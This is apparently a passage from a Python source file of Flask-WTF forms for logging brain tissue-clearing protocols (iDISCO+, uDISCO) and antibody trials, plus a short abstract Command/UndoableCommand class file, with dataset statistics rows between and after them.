	# dehydr_methanol_100percent_wash3_notes_submit = SubmitField('Update Notes')
	# time_dehydr_methanol_100percent_wash4 = OptionalDateTimeLocalField('100% methanol R@RTX24hrs')
	# time_dehydr_methanol_100percent_wash4_submit = SubmitField('Update')
	# dehydr_methanol_100percent_wash4_notes = TextAreaField('Notes:',validators=[Length(max=250)])
	# dehydr_methanol_100percent_wash4_notes_submit = SubmitField('Update Notes')
	# time_dehydr_methanol_100percent_wash5 = OptionalDateTimeLocalField('100% methanol R@RTX2hrs (or overnight)')
	# time_dehydr_methanol_100percent_wash5_submit = SubmitField('Update')
	# dehydr_methanol_100percent_wash5_notes = TextAreaField('Notes:',validators=[Length(max=250)])
	# dehydr_methanol_100percent_wash5_notes_submit = SubmitField('Update Notes')
	time_dehydr_dcm_66percent_methanol_33percent = OptionalDateTimeLocalField('66% DCM / 33% methanol R@RTx24hrs')
	time_dehydr_dcm_66percent_methanol_33percent_submit = SubmitField('Update')
	dehydr_dcm_66percent_methanol_33percent_notes = TextAreaField('Notes:',validators=[Length(max=250)])
	dehydr_dcm_66percent_methanol_33percent_notes_submit = SubmitField('Update Notes')
	time_dehydr_dcm_wash1 = OptionalDateTimeLocalField('100% DCM R@RTx24hrs')
	time_dehydr_dcm_wash1_submit = SubmitField('Update')
	dehydr_dcm_wash1_notes = TextAreaField('Notes:',validators=[Length(max=250)])
	dehydr_dcm_wash1_notes_submit = SubmitField('Update Notes')
	# time_dehydr_dcm_wash2 = OptionalDateTimeLocalField('100% DCM R@RTx1hr (wash 2)')
	# time_dehydr_dcm_wash2_submit = SubmitField('Update')
	# dehydr_dcm_wash2_notes = TextAreaField('Notes:',validators=[Length(max=250)])
	# dehydr_dcm_wash2_notes_submit = SubmitField('Update Notes')
	time_dehydr_dbe_wash1 = OptionalDateTimeLocalField('100% DBE - 24 hrs')
	time_dehydr_dbe_wash1_submit = SubmitField('Update')
	dehydr_dbe_wash1_notes = TextAreaField('Notes:',validators=[Length(max=250)])
	dehydr_dbe_wash1_notes_submit = SubmitField('Update Notes')
	time_dehydr_dbe_wash2 = OptionalDateTimeLocalField('Put brains in new tubes with prepoured 100% DBE no rocking')
	time_dehydr_dbe_wash2_submit = SubmitField('Update')
	dehydr_dbe_wash2_notes = TextAreaField('Notes:',validators=[Length(max=250)])
	dehydr_dbe_wash2_notes_submit = SubmitField('Update Notes')
	clearing_notes = TextAreaField('Clearing Notes',validators=[Length(max=500)])
	clearing_notes_submit = SubmitField('Update')
	submit = SubmitField('Submit')
class uDiscoForm(FlaskForm):
	""" Form for entering clearing information for the uDISCO protocol.

	Fields follow the same repeating pattern as the other clearing forms:
	``time_<step>`` optional datetime + submit button and
	``<step>_notes`` text area + submit button, grouped into dehydration
	(t-butanol gradient) and clearing (DCM, BABB-D10) phases.
	"""
	title = 'uDISCO'
	exp_notes = TextAreaField('Experiment Notes: If anything unusual happened \
	during the experiment that might affect clearing, please note it here:',validators=[Length(max=500)])
	exp_notes_submit = SubmitField('Update')
	dehydr_date = OptionalDateField('Dehydration')
	dehydr_date_submit = SubmitField('Push date to calendar (optional)')
	time_dehydr_pbs_wash1 = OptionalDateTimeLocalField('0.1M PBS R@RT5min')
	time_dehydr_pbs_wash1_submit = SubmitField('Update')
	dehydr_pbs_wash1_notes = TextAreaField('Notes:',validators=[Length(max=250)])
	dehydr_pbs_wash1_notes_submit = SubmitField('Update Notes')
	time_dehydr_butanol_30percent = OptionalDateTimeLocalField('30% t-butanol R@35C O/N')
	time_dehydr_butanol_30percent_submit = SubmitField('Update')
	dehydr_butanol_30percent_notes = TextAreaField('Notes:',validators=[Length(max=250)])
	dehydr_butanol_30percent_notes_submit = SubmitField('Update Notes')
	time_dehydr_butanol_50percent = OptionalDateTimeLocalField('50% t-butanol R@35C 10 h')
	time_dehydr_butanol_50percent_submit = SubmitField('Update')
	dehydr_butanol_50percent_notes = TextAreaField('Notes:',validators=[Length(max=250)])
	dehydr_butanol_50percent_notes_submit = SubmitField('Update Notes')
	time_dehydr_butanol_70percent = OptionalDateTimeLocalField('70% t-butanol R@35C O/N')
	time_dehydr_butanol_70percent_submit = SubmitField('Update')
	dehydr_butanol_70percent_notes = TextAreaField('Notes:',validators=[Length(max=250)])
	dehydr_butanol_70percent_notes_submit = SubmitField('Update Notes')
	time_dehydr_butanol_80percent = OptionalDateTimeLocalField('80% t-butanol R@35C 10 h')
	time_dehydr_butanol_80percent_submit = SubmitField('Update')
	dehydr_butanol_80percent_notes = TextAreaField('Notes:',validators=[Length(max=250)])
	dehydr_butanol_80percent_notes_submit = SubmitField('Update Notes')
	time_dehydr_butanol_90percent = OptionalDateTimeLocalField('90% t-butanol R@35C O/N')
	time_dehydr_butanol_90percent_submit = SubmitField('Update')
	dehydr_butanol_90percent_notes = TextAreaField('Notes:',validators=[Length(max=250)])
	dehydr_butanol_90percent_notes_submit = SubmitField('Update Notes')
	time_dehydr_butanol_96percent = OptionalDateTimeLocalField('96% t-butanol R@35C 10 h')
	time_dehydr_butanol_96percent_submit = SubmitField('Update')
	dehydr_butanol_96percent_notes = TextAreaField('Notes:',validators=[Length(max=250)])
	dehydr_butanol_96percent_notes_submit = SubmitField('Update Notes')
	time_dehydr_butanol_100percent = OptionalDateTimeLocalField('100% t-butanol R@35C O/N')
	time_dehydr_butanol_100percent_submit = SubmitField('Update')
	dehydr_butanol_100percent_notes = TextAreaField('Notes:',validators=[Length(max=250)])
	dehydr_butanol_100percent_notes_submit = SubmitField('Update Notes')
	clearing_date = OptionalDateField('Clearing')
	clearing_date_submit = SubmitField('Push date to calendar (optional)')
	time_clearing_dcm_wash1 = OptionalDateTimeLocalField('100% DCM R@RT 50-70min')
	time_clearing_dcm_wash1_submit = SubmitField('Update')
	clearing_dcm_wash1_notes = TextAreaField('Notes:',validators=[Length(max=250)])
	clearing_dcm_wash1_notes_submit = SubmitField('Update Notes')
	time_clearing_babb_wash1 = OptionalDateTimeLocalField('BABB-D10 >3hrs')
	time_clearing_babb_wash1_submit = SubmitField('Update')
	clearing_babb_wash1_notes = TextAreaField('Notes:',validators=[Length(max=250)])
	clearing_babb_wash1_notes_submit = SubmitField('Update Notes')
	clearing_notes = TextAreaField('Clearing Notes',validators=[Length(max=500)])
	clearing_notes_submit = SubmitField('Update Notes')
	submit = SubmitField('Submit')
class uDiscoRatForm(FlaskForm):
    """Clearing form for the Rat uDISCO protocol.

    Each protocol step gets three fields: an optional datetime recording when
    the step was performed, a free-text notes field, and a per-step submit
    button so each entry can be saved independently. The date fields can
    optionally be pushed to a calendar.
    """
    title = 'Rat uDISCO'
    exp_notes = TextAreaField('Experiment Notes: If anything unusual happened \
during the experiment that might affect clearing, please note it here:',validators=[Length(max=500)])
    exp_notes_submit = SubmitField('Update')
    # --- Dehydration: PBS wash followed by an ascending t-butanol series ---
    dehydr_date = OptionalDateField('Dehydration')
    dehydr_date_submit = SubmitField('Push date to calendar (optional)')
    time_dehydr_pbs_wash1 = OptionalDateTimeLocalField('0.1M PBS R@RT 30 mins')
    time_dehydr_pbs_wash1_submit = SubmitField('Update')
    dehydr_pbs_wash1_notes = TextAreaField('Notes:',validators=[Length(max=250)])
    dehydr_pbs_wash1_notes_submit = SubmitField('Update Notes')
    time_dehydr_butanol_30percent = OptionalDateTimeLocalField('30% t-butanol R@35C O/N 24 hrs')
    time_dehydr_butanol_30percent_submit = SubmitField('Update')
    dehydr_butanol_30percent_notes = TextAreaField('Notes:',validators=[Length(max=250)])
    dehydr_butanol_30percent_notes_submit = SubmitField('Update Notes')
    time_dehydr_butanol_50percent = OptionalDateTimeLocalField('50% t-butanol R@35C 24 hrs')
    time_dehydr_butanol_50percent_submit = SubmitField('Update')
    dehydr_butanol_50percent_notes = TextAreaField('Notes:',validators=[Length(max=250)])
    dehydr_butanol_50percent_notes_submit = SubmitField('Update Notes')
    time_dehydr_butanol_70percent = OptionalDateTimeLocalField('70% t-butanol R@35C O/N 24 hrs')
    time_dehydr_butanol_70percent_submit = SubmitField('Update')
    dehydr_butanol_70percent_notes = TextAreaField('Notes:',validators=[Length(max=250)])
    dehydr_butanol_70percent_notes_submit = SubmitField('Update Notes')
    time_dehydr_butanol_80percent = OptionalDateTimeLocalField('80% t-butanol R@35C 24 hrs')
    time_dehydr_butanol_80percent_submit = SubmitField('Update')
    dehydr_butanol_80percent_notes = TextAreaField('Notes:',validators=[Length(max=250)])
    dehydr_butanol_80percent_notes_submit = SubmitField('Update Notes')
    time_dehydr_butanol_90percent = OptionalDateTimeLocalField('90% t-butanol R@35C O/N 24 hrs')
    time_dehydr_butanol_90percent_submit = SubmitField('Update')
    dehydr_butanol_90percent_notes = TextAreaField('Notes:',validators=[Length(max=250)])
    dehydr_butanol_90percent_notes_submit = SubmitField('Update Notes')
    time_dehydr_butanol_96percent = OptionalDateTimeLocalField('96% t-butanol R@35C 24 hrs')
    time_dehydr_butanol_96percent_submit = SubmitField('Update')
    dehydr_butanol_96percent_notes = TextAreaField('Notes:',validators=[Length(max=250)])
    dehydr_butanol_96percent_notes_submit = SubmitField('Update Notes')
    time_dehydr_butanol_100percent = OptionalDateTimeLocalField('100% t-butanol R@35C O/N 24 hrs')
    time_dehydr_butanol_100percent_submit = SubmitField('Update')
    dehydr_butanol_100percent_notes = TextAreaField('Notes:',validators=[Length(max=250)])
    dehydr_butanol_100percent_notes_submit = SubmitField('Update Notes')
    # --- Clearing: DCM wash followed by BABB-D15 immersion ---
    clearing_date = OptionalDateField('Clearing')
    clearing_date_submit = SubmitField('Push date to calendar (optional)')
    time_clearing_dcm_wash1 = OptionalDateTimeLocalField('100% DCM R@RT 2.5-3 hrs')
    time_clearing_dcm_wash1_submit = SubmitField('Update')
    clearing_dcm_wash1_notes = TextAreaField('Notes:',validators=[Length(max=250)])
    clearing_dcm_wash1_notes_submit = SubmitField('Update Notes')
    time_clearing_babb_wash1 = OptionalDateTimeLocalField('BABB-D15 > 3hrs')
    time_clearing_babb_wash1_submit = SubmitField('Update')
    clearing_babb_wash1_notes = TextAreaField('Notes:',validators=[Length(max=250)])
    clearing_babb_wash1_notes_submit = SubmitField('Update Notes')
    clearing_notes = TextAreaField('Clearing Notes',validators=[Length(max=500)])
    clearing_notes_submit = SubmitField('Update Notes')
    submit = SubmitField('Submit')
class iDiscoEduForm(FlaskForm):
    """Clearing form for the iDISCO+ immunostaining (EdU) protocol.

    Each protocol step gets an optional datetime field recording when the
    step was performed, a notes field, and a per-step submit button so each
    entry can be saved independently. The per-section date fields can
    optionally be pushed to a calendar.
    """
    title = 'iDISCO+ Immunostaining'
    exp_notes = TextAreaField('Experiment Notes: If anything unusual happened during the \
experiment that might affect clearing, please note it here.',validators=[Length(max=500)])
    exp_notes_submit = SubmitField('Update')
    # --- Dehydration: PBS washes, ascending methanol series, peroxide bleach ---
    dehydr_date = OptionalDateField('Dehydration')
    dehydr_date_submit = SubmitField('Push date to calendar (optional)')
    time_dehydr_pbs_wash1 = OptionalDateTimeLocalField('1xPBS 30 min R@RT')
    time_dehydr_pbs_wash1_submit = SubmitField('Update')
    dehydr_pbs_wash1_notes = TextAreaField('Notes',validators=[Length(max=100)])
    dehydr_pbs_wash1_notes_submit = SubmitField('Update Notes')
    time_dehydr_pbs_wash2 = OptionalDateTimeLocalField('2xPBS 30 min R@RT')
    time_dehydr_pbs_wash2_submit = SubmitField('Update')
    dehydr_pbs_wash2_notes = TextAreaField('Notes',validators=[Length(max=100)])
    dehydr_pbs_wash2_notes_submit = SubmitField('Update Notes')
    time_dehydr_pbs_wash3 = OptionalDateTimeLocalField('3xPBS 30 min R@RT')
    time_dehydr_pbs_wash3_submit = SubmitField('Update')
    dehydr_pbs_wash3_notes = TextAreaField('Notes',validators=[Length(max=100)])
    dehydr_pbs_wash3_notes_submit = SubmitField('Update Notes')
    time_dehydr_methanol_20percent_wash1 = OptionalDateTimeLocalField('20% methanol R@RTx1hr')
    time_dehydr_methanol_20percent_wash1_submit = SubmitField('Update')
    dehydr_methanol_20percent_wash1_notes = TextAreaField('Notes',validators=[Length(max=100)])
    dehydr_methanol_20percent_wash1_notes_submit = SubmitField('Update Notes')
    time_dehydr_methanol_40percent_wash1 = OptionalDateTimeLocalField('40% methanol R@RTx1hr')
    time_dehydr_methanol_40percent_wash1_submit = SubmitField('Update')
    dehydr_methanol_40percent_wash1_notes = TextAreaField('Notes',validators=[Length(max=100)])
    dehydr_methanol_40percent_wash1_notes_submit = SubmitField('Update Notes')
    time_dehydr_methanol_60percent_wash1 = OptionalDateTimeLocalField('60% methanol R@RTx1hr')
    time_dehydr_methanol_60percent_wash1_submit = SubmitField('Update')
    dehydr_methanol_60percent_wash1_notes = TextAreaField('Notes',validators=[Length(max=100)])
    dehydr_methanol_60percent_wash1_notes_submit = SubmitField('Update Notes')
    time_dehydr_methanol_80percent_wash1 = OptionalDateTimeLocalField('80% methanol R@RTx1hr')
    time_dehydr_methanol_80percent_wash1_submit = SubmitField('Update')
    dehydr_methanol_80percent_wash1_notes = TextAreaField('Notes',validators=[Length(max=100)])
    dehydr_methanol_80percent_wash1_notes_submit = SubmitField('Update Notes')
    time_dehydr_methanol_100percent_wash1 = OptionalDateTimeLocalField('100% methanol R@RTx1hr (first hour)')
    time_dehydr_methanol_100percent_wash1_submit = SubmitField('Update')
    dehydr_methanol_100percent_wash1_notes = TextAreaField('Notes',validators=[Length(max=100)])
    dehydr_methanol_100percent_wash1_notes_submit = SubmitField('Update Notes')
    time_dehydr_methanol_100percent_wash2 = OptionalDateTimeLocalField('100% methanol R@RTx1hr (second hour)')
    time_dehydr_methanol_100percent_wash2_submit = SubmitField('Update')
    dehydr_methanol_100percent_wash2_notes = TextAreaField('Notes',validators=[Length(max=100)])
    dehydr_methanol_100percent_wash2_notes_submit = SubmitField('Update Notes')
    time_dehydr_peroxide_wash1 = OptionalDateTimeLocalField('5% H2O2 (30%) in methanol(100%) O/N R@RT (1 part H2O2:5 parts methanol)')
    time_dehydr_peroxide_wash1_submit = SubmitField('Update')
    dehydr_peroxide_wash1_notes = TextAreaField('Notes',validators=[Length(max=100)])
    dehydr_peroxide_wash1_notes_submit = SubmitField('Update Notes')
    # --- Rehydration: descending methanol series back into PBS/detergent ---
    rehydr_date = OptionalDateField('Rehydration')
    rehydr_date_submit = SubmitField('Push date to calendar (optional)')
    time_rehydr_methanol_100percent_wash1 = OptionalDateTimeLocalField('100% methanol R@RTx1hr')
    time_rehydr_methanol_100percent_wash1_submit = SubmitField('Update')
    rehydr_methanol_100percent_wash1_notes = TextAreaField('Notes',validators=[Length(max=100)])
    rehydr_methanol_100percent_wash1_notes_submit = SubmitField('Update Notes')
    time_rehydr_methanol_80percent_wash1 = OptionalDateTimeLocalField('80% methanol R@RTx1hr')
    time_rehydr_methanol_80percent_wash1_submit = SubmitField('Update')
    rehydr_methanol_80percent_wash1_notes = TextAreaField('Notes',validators=[Length(max=100)])
    rehydr_methanol_80percent_wash1_notes_submit = SubmitField('Update Notes')
    time_rehydr_methanol_60percent_wash1 = OptionalDateTimeLocalField('60% methanol R@RTx1hr')
    time_rehydr_methanol_60percent_wash1_submit = SubmitField('Update')
    rehydr_methanol_60percent_wash1_notes = TextAreaField('Notes',validators=[Length(max=100)])
    rehydr_methanol_60percent_wash1_notes_submit = SubmitField('Update Notes')
    time_rehydr_methanol_40percent_wash1 = OptionalDateTimeLocalField('40% methanol R@RTx1hr')
    time_rehydr_methanol_40percent_wash1_submit = SubmitField('Update')
    rehydr_methanol_40percent_wash1_notes = TextAreaField('Notes',validators=[Length(max=100)])
    rehydr_methanol_40percent_wash1_notes_submit = SubmitField('Update Notes')
    time_rehydr_methanol_20percent_wash1 = OptionalDateTimeLocalField('20% methanol R@RTx1hr')
    time_rehydr_methanol_20percent_wash1_submit = SubmitField('Update')
    rehydr_methanol_20percent_wash1_notes = TextAreaField('Notes',validators=[Length(max=100)])
    rehydr_methanol_20percent_wash1_notes_submit = SubmitField('Update Notes')
    time_rehydr_pbs_wash1 = OptionalDateTimeLocalField('PBS R@RTx1hr')
    time_rehydr_pbs_wash1_submit = SubmitField('Update')
    rehydr_pbs_wash1_notes = TextAreaField('Notes',validators=[Length(max=100)])
    rehydr_pbs_wash1_notes_submit = SubmitField('Update Notes')
    time_rehydr_sodium_azide_wash1 = OptionalDateTimeLocalField('0.2%TritonX-100/1xPBS/0.1% sodium azide R@RTx1hr (first hour)')
    time_rehydr_sodium_azide_wash1_submit = SubmitField('Update')
    rehydr_sodium_azide_wash1_notes = TextAreaField('Notes',validators=[Length(max=100)])
    rehydr_sodium_azide_wash1_notes_submit = SubmitField('Update Notes')
    time_rehydr_sodium_azide_wash2 = OptionalDateTimeLocalField('0.2%TritonX-100/1xPBS/0.1% sodium azide R@RTx1hr (second hour)')
    time_rehydr_sodium_azide_wash2_submit = SubmitField('Update')
    rehydr_sodium_azide_wash2_notes = TextAreaField('Notes',validators=[Length(max=100)])
    rehydr_sodium_azide_wash2_notes_submit = SubmitField('Update Notes')
    time_rehydr_glycine_wash1 = OptionalDateTimeLocalField('20%DMSO/0.3M glycine/0.2% TritonX-100/0.1%sodium azide/1xPBS R@37C for 2 days')
    time_rehydr_glycine_wash1_submit = SubmitField('Update')
    rehydr_glycine_wash1_notes = TextAreaField('Notes',validators=[Length(max=100)])
    rehydr_glycine_wash1_notes_submit = SubmitField('Update Notes')
    # --- Wash 1: PTwH washes of increasing duration ---
    wash1_date = OptionalDateField('Wash')
    wash1_date_submit = SubmitField('Push date to calendar (optional)')
    time_wash1_start_roomtemp = OptionalDateTimeLocalField('Sample R@RT for ~1.5hrs')
    time_wash1_start_roomtemp_submit = SubmitField('Update')
    wash1_start_roomtemp_notes = TextAreaField('Notes',validators=[Length(max=100)])
    wash1_start_roomtemp_notes_submit = SubmitField('Update Notes')
    time_wash1_ptwh_wash1 = OptionalDateTimeLocalField('PTwH 10 min')
    time_wash1_ptwh_wash1_submit = SubmitField('Update')
    wash1_ptwh_wash1_notes = TextAreaField('Notes',validators=[Length(max=100)])
    wash1_ptwh_wash1_notes_submit = SubmitField('Update Notes')
    time_wash1_ptwh_wash2 = OptionalDateTimeLocalField('PTwH 15 min')
    time_wash1_ptwh_wash2_submit = SubmitField('Update')
    wash1_ptwh_wash2_notes = TextAreaField('Notes',validators=[Length(max=100)])
    wash1_ptwh_wash2_notes_submit = SubmitField('Update Notes')
    time_wash1_ptwh_wash3 = OptionalDateTimeLocalField('PTwH 30 min')
    time_wash1_ptwh_wash3_submit = SubmitField('Update')
    wash1_ptwh_wash3_notes = TextAreaField('Notes',validators=[Length(max=100)])
    wash1_ptwh_wash3_notes_submit = SubmitField('Update Notes')
    time_wash1_ptwh_wash4 = OptionalDateTimeLocalField('PTwH 1 hr')
    time_wash1_ptwh_wash4_submit = SubmitField('Update')
    wash1_ptwh_wash4_notes = TextAreaField('Notes',validators=[Length(max=100)])
    wash1_ptwh_wash4_notes_submit = SubmitField('Update Notes')
    time_wash1_ptwh_wash5 = OptionalDateTimeLocalField('PTwH 2 hr')
    time_wash1_ptwh_wash5_submit = SubmitField('Update')
    wash1_ptwh_wash5_notes = TextAreaField('Notes',validators=[Length(max=100)])
    wash1_ptwh_wash5_notes_submit = SubmitField('Update Notes')
    # --- EdU click chemistry (date only) ---
    edu_click_chemistry_date = OptionalDateField('EdU click chemistry')
    edu_click_chemistry_date_submit = SubmitField('Push date to calendar (optional)')
    # --- Wash 2: PTwH washes again.
    # NOTE(review): unlike wash 1 there is no time_wash2_start_roomtemp field
    # here, only its notes field — confirm whether that is intentional.
    wash2_date = OptionalDateField('Wash')
    wash2_date_submit = SubmitField('Push date to calendar (optional)')
    wash2_start_roomtemp_notes = TextAreaField('Notes',validators=[Length(max=100)])
    wash2_start_roomtemp_notes_submit = SubmitField('Update Notes')
    time_wash2_ptwh_wash1 = OptionalDateTimeLocalField('PTwH 10 min')
    time_wash2_ptwh_wash1_submit = SubmitField('Update')
    wash2_ptwh_wash1_notes = TextAreaField('Notes',validators=[Length(max=100)])
    wash2_ptwh_wash1_notes_submit = SubmitField('Update Notes')
    time_wash2_ptwh_wash2 = OptionalDateTimeLocalField('PTwH 15 min')
    time_wash2_ptwh_wash2_submit = SubmitField('Update')
    wash2_ptwh_wash2_notes = TextAreaField('Notes',validators=[Length(max=100)])
    wash2_ptwh_wash2_notes_submit = SubmitField('Update Notes')
    time_wash2_ptwh_wash3 = OptionalDateTimeLocalField('PTwH 30 min')
    time_wash2_ptwh_wash3_submit = SubmitField('Update')
    wash2_ptwh_wash3_notes = TextAreaField('Notes',validators=[Length(max=100)])
    wash2_ptwh_wash3_notes_submit = SubmitField('Update Notes')
    time_wash2_ptwh_wash4 = OptionalDateTimeLocalField('PTwH 1 hr')
    time_wash2_ptwh_wash4_submit = SubmitField('Update')
    wash2_ptwh_wash4_notes = TextAreaField('Notes',validators=[Length(max=100)])
    wash2_ptwh_wash4_notes_submit = SubmitField('Update Notes')
    time_wash2_ptwh_wash5 = OptionalDateTimeLocalField('PTwH 2 hr')
    time_wash2_ptwh_wash5_submit = SubmitField('Update')
    wash2_ptwh_wash5_notes = TextAreaField('Notes',validators=[Length(max=100)])
    wash2_ptwh_wash5_notes_submit = SubmitField('Update Notes')
    # --- Clearing: ascending methanol, DCM/methanol mix, DCM washes, DBE ---
    clearing_date = OptionalDateField('Clearing')
    clearing_date_submit = SubmitField('Push date to calendar (optional)')
    time_clearing_methanol_20percent_wash1 = OptionalDateTimeLocalField('20% methanol R@RTx1hr')
    time_clearing_methanol_20percent_wash1_submit = SubmitField('Update')
    clearing_methanol_20percent_wash1_notes = TextAreaField('Notes',validators=[Length(max=100)])
    clearing_methanol_20percent_wash1_notes_submit = SubmitField('Update Notes')
    time_clearing_methanol_40percent_wash1 = OptionalDateTimeLocalField('40% methanol R@RTx1hr')
    time_clearing_methanol_40percent_wash1_submit = SubmitField('Update')
    clearing_methanol_40percent_wash1_notes = TextAreaField('Notes',validators=[Length(max=100)])
    clearing_methanol_40percent_wash1_notes_submit = SubmitField('Update Notes')
    time_clearing_methanol_60percent_wash1 = OptionalDateTimeLocalField('60% methanol R@RTx1hr')
    time_clearing_methanol_60percent_wash1_submit = SubmitField('Update')
    clearing_methanol_60percent_wash1_notes = TextAreaField('Notes',validators=[Length(max=100)])
    clearing_methanol_60percent_wash1_notes_submit = SubmitField('Update Notes')
    time_clearing_methanol_80percent_wash1 = OptionalDateTimeLocalField('80% methanol R@RTx1hr')
    time_clearing_methanol_80percent_wash1_submit = SubmitField('Update')
    clearing_methanol_80percent_wash1_notes = TextAreaField('Notes',validators=[Length(max=100)])
    clearing_methanol_80percent_wash1_notes_submit = SubmitField('Update Notes')
    time_clearing_methanol_100percent_wash1 = OptionalDateTimeLocalField('100% methanol R@RTx1hr (hour 1)')
    time_clearing_methanol_100percent_wash1_submit = SubmitField('Update')
    clearing_methanol_100percent_wash1_notes = TextAreaField('Notes',validators=[Length(max=100)])
    clearing_methanol_100percent_wash1_notes_submit = SubmitField('Update Notes')
    time_clearing_methanol_100percent_wash2 = OptionalDateTimeLocalField('100% methanol R@RTx1hr (hour 2)')
    time_clearing_methanol_100percent_wash2_submit = SubmitField('Update')
    clearing_methanol_100percent_wash2_notes = TextAreaField('Notes',validators=[Length(max=100)])
    clearing_methanol_100percent_wash2_notes_submit = SubmitField('Update Notes')
    time_clearing_dcm_66percent_methanol_33percent = OptionalDateTimeLocalField('66% DCM / 33% methanol R@RTx3hrs')
    time_clearing_dcm_66percent_methanol_33percent_submit = SubmitField('Update')
    clearing_dcm_66percent_methanol_33percent_notes = TextAreaField('Notes',validators=[Length(max=100)])
    clearing_dcm_66percent_methanol_33percent_notes_submit = SubmitField('Update Notes')
    time_clearing_dcm_wash1 = OptionalDateTimeLocalField('100% DCM R@RTx15 min (wash 1)')
    time_clearing_dcm_wash1_submit = SubmitField('Update')
    clearing_dcm_wash1_notes = TextAreaField('Notes',validators=[Length(max=100)])
    clearing_dcm_wash1_notes_submit = SubmitField('Update Notes')
    time_clearing_dcm_wash2 = OptionalDateTimeLocalField('100% DCM R@RTx15 min (wash 2)')
    time_clearing_dcm_wash2_submit = SubmitField('Update')
    clearing_dcm_wash2_notes = TextAreaField('Notes',validators=[Length(max=100)])
    clearing_dcm_wash2_notes_submit = SubmitField('Update Notes')
    time_clearing_dbe = OptionalDateTimeLocalField('100% DBE > hr')
    time_clearing_dbe_submit = SubmitField('Update')
    clearing_dbe_notes = TextAreaField('Notes',validators=[Length(max=100)])
    clearing_dbe_notes_submit = SubmitField('Update Notes')
    time_clearing_new_tubes = OptionalDateTimeLocalField('put brains in new tubes with prepoured 100% DBE no rocking')
    time_clearing_new_tubes_submit = SubmitField('Update')
    clearing_new_tubes_notes = TextAreaField('Notes',validators=[Length(max=100)])
    clearing_new_tubes_notes_submit = SubmitField('Update Notes')
    clearing_notes = TextAreaField('Clearing Notes',validators=[Length(max=500)])
    # NOTE(review): this submit's label is 'Update' while sibling forms use
    # 'Update Notes' — confirm whether that is intentional.
    clearing_notes_submit = SubmitField('Update')
    submit = SubmitField('Submit')
class experimentalForm(FlaskForm):
    """Form for an experimental (non-standard) clearing protocol.

    Instead of per-step fields, the user supplies a required link to an
    external spreadsheet documenting the custom protocol.
    """
    title = 'experimental'
    link_to_clearing_spreadsheet = StringField('Link to clearing spreadsheet:',validators=[DataRequired(),Length(max=500)])
    submit = SubmitField('Submit')
class NewAntibodyForm(FlaskForm):
    """Form for entering a new antibody trial into the antibody history table.

    The core descriptor fields are required (InputRequired); order info and
    comments are optional. All text fields are length-limited.
    """
    title = 'new antibody form'
    date = DateField('Date')
    brief_descriptor = StringField('Brief exp description',validators=[InputRequired(),Length(max=128)])
    animal_model = StringField('Animal model',validators=[InputRequired(),Length(max=128)])
    primary_antibody = StringField('Primary antibody',validators=[InputRequired(),Length(max=128)])
    primary_concentration = StringField('Primary concentration used',validators=[InputRequired(),Length(max=128)])
    primary_order_info = StringField('Primary order info',validators=[Optional(),Length(max=128)])
    secondary_antibody = StringField('Secondary antibody',validators=[InputRequired(),Length(max=128)])
    secondary_concentration = StringField('Secondary concentration used',validators=[InputRequired(),Length(max=128)])
    secondary_order_info = StringField('Secondary order info',validators=[Optional(),Length(max=128)])
    notes = StringField('Comments',validators=[Optional(),Length(max=512)])
    submit = SubmitField('Submit')
class EditAntibodyForm(FlaskForm):
    """Form for editing an existing antibody-history entry.

    NOTE(review): unlike NewAntibodyForm, most descriptor fields here carry
    no validators (no InputRequired/Length) — confirm whether unbounded,
    optional edits are intentional.
    """
    title = 'Edit antibody history form'
    date = DateField('Date')
    brief_descriptor = StringField('Brief exp description',)
    animal_model = StringField('Animal model',)
    primary_antibody = StringField('Primary antibody',)
    primary_concentration = StringField('Primary concentration used',)
    primary_order_info = StringField('Primary order info',validators=[Optional(),Length(max=128)])
    secondary_antibody = StringField('Secondary antibody',)
    secondary_concentration = StringField('Secondary concentration used',)
    secondary_order_info = StringField('Secondary order info',validators=[Optional(),Length(max=128)])
    notes = TextAreaField('Notes',validators=[Optional(),Length(max=512)])
    submit = SubmitField('Submit changes')
| 66.103155
| 151
| 0.822762
| 6,548
| 54,469
| 6.47526
| 0.038332
| 0.136321
| 0.167618
| 0.10566
| 0.944434
| 0.929363
| 0.908208
| 0.898892
| 0.880708
| 0.85717
| 0
| 0.047321
| 0.075089
| 54,469
| 823
| 152
| 66.183475
| 0.79426
| 0.056693
| 0
| 0.761024
| 0
| 0.012802
| 0.170568
| 0.002894
| 0
| 0
| 0
| 0
| 0
| 1
| 0.002845
| false
| 0
| 0.007112
| 0
| 0.98293
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 8
|
d955976b5d84d4f204f67c2309a1f956b904be9a
| 240
|
py
|
Python
|
baduk/command/command_types.py
|
sarcoma/Baduk
|
dd99ec81548d56449691db454662f467a840c9d4
|
[
"MIT"
] | 3
|
2020-01-25T08:46:31.000Z
|
2020-05-20T09:44:27.000Z
|
baduk/command/command_types.py
|
sarcoma/Baduk
|
dd99ec81548d56449691db454662f467a840c9d4
|
[
"MIT"
] | null | null | null |
baduk/command/command_types.py
|
sarcoma/Baduk
|
dd99ec81548d56449691db454662f467a840c9d4
|
[
"MIT"
] | null | null | null |
from abc import ABCMeta, abstractmethod
class Command(metaclass=ABCMeta):
    """Abstract base class of the Command pattern.

    A command encapsulates a single executable action behind execute();
    the class cannot be instantiated until execute() is overridden.
    """

    @abstractmethod
    def execute(self):
        """Carry out the command's action; concrete subclasses must override."""
class UndoableCommand(Command, metaclass=ABCMeta):
    """A Command whose effect can be reversed.

    In addition to execute() (inherited abstract), subclasses must provide
    undo() to roll back a previously executed action.
    """

    @abstractmethod
    def undo(self):
        """Reverse the effect of a prior execute(); subclasses must override."""
| 15
| 50
| 0.691667
| 24
| 240
| 6.916667
| 0.583333
| 0.379518
| 0.277108
| 0.445783
| 0.481928
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.233333
| 240
| 15
| 51
| 16
| 0.902174
| 0
| 0
| 0.444444
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.222222
| false
| 0.222222
| 0.111111
| 0
| 0.555556
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
| 0
|
0
| 7
